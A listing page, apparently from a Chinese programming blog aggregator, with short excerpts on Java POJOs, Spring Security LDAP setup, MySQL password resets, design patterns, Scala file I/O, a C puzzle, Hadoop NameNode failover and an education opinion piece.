    POJO和JavaBean是我们常见的两个关键字,一般容易混淆,POJO全称是Plain Ordinary Java Object / Plain Old Java Object,中文可以翻译成:普通Java类,具有一部分getter/setter方法的那种类就可以称作POJO,但是JavaBean则比POJO复杂很多,JavaBean是一种组件技术,就好像你做了一个扳子,而这个扳子会在很多地方被
  • SpringSecurity3.X--LDAP:AD配置 hanqunfeng SpringSecurity
    前面介绍过基于本地数据库验证的方式,参考http://hanqunfeng.iteye.com/blog/1155226,这里说一下如何修改为使用AD进行身份验证【只对用户名和密码进行验证,权限依旧存储在本地数据库中】。   将配置文件中的如下部分删除: <!-- 认证管理器,使用自定义的UserDetailsService,并对密码采用md5加密-->
  • mac mysql 修改密码 IXHONG mysql
    $ sudo /usr/local/mysql/bin/mysqld_safe –user=root & //启动MySQL(也可以通过偏好设置面板来启动)$ sudo /usr/local/mysql/bin/mysqladmin -uroot password yourpassword //设置MySQL密码(注意,这是第一次MySQL密码为空的时候的设置命令,如果是修改密码,还需在-
  • 设计模式--抽象工厂模式 kerryg 设计模式
    抽象工厂模式:     工厂模式有一个问题就是,类的创建依赖于工厂类,也就是说,如果想要拓展程序,必须对工厂类进行修改,这违背了闭包原则。我们采用抽象工厂模式,创建多个工厂类,这样一旦需要增加新的功能,直接增加新的工厂类就可以了,不需要修改之前的代码。     总结:这个模式的好处就是,如果想增加一个功能,就需要做一个实现类,
  • 评"高中女生军训期跳楼” nannan408
       首先,先抛出我的观点,各位看官少点砖头。那就是,中国的差异化教育必须做起来。    孔圣人有云:有教无类。不同类型的人,都应该有对应的教育方法。目前中国的一体化教育,不知道已经扼杀了多少创造性人才。我们出不了爱迪生,出不了爱因斯坦,很大原因,是我们的培养思路错了,我们是第一要“顺从”。如果不顺从,我们的学校,就会用各种方法,罚站,罚写作业,各种罚。军
  • scala如何读取和写入文件内容? qindongliang1922 javajvmscala
    直接看如下代码: package file import java.io.RandomAccessFile import java.nio.charset.Charset import scala.io.Source import scala.reflect.io.{File, Path} /** * Created by qindongliang on 2015/
  • C语言算法之百元买百鸡 qiufeihu c算法
    中国古代数学家张丘建在他的《算经》中提出了一个著名的“百钱买百鸡问题”,鸡翁一,值钱五,鸡母一,值钱三,鸡雏三,值钱一,百钱买百鸡,问翁,母,雏各几何? 代码如下: #include <stdio.h> int main() { int cock,hen,chick; /*定义变量为基本整型*/ for(coc
  • Hadoop集群安全性:Hadoop中Namenode单点故障的解决方案及详细介绍AvatarNode wyz2009107220 NameNode
    正如大家所知,NameNode在Hadoop系统中存在单点故障问题,这个对于标榜高可用性的Hadoop来说一直是个软肋。本文讨论一下为了解决这个问题而存在的几个solution。 1. Secondary NameNode 原理:Secondary NN会定期的从NN中读取editlog,与自己存储的Image进行合并形成新的metadata image 优点:Hadoop较早的版本都自带,
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他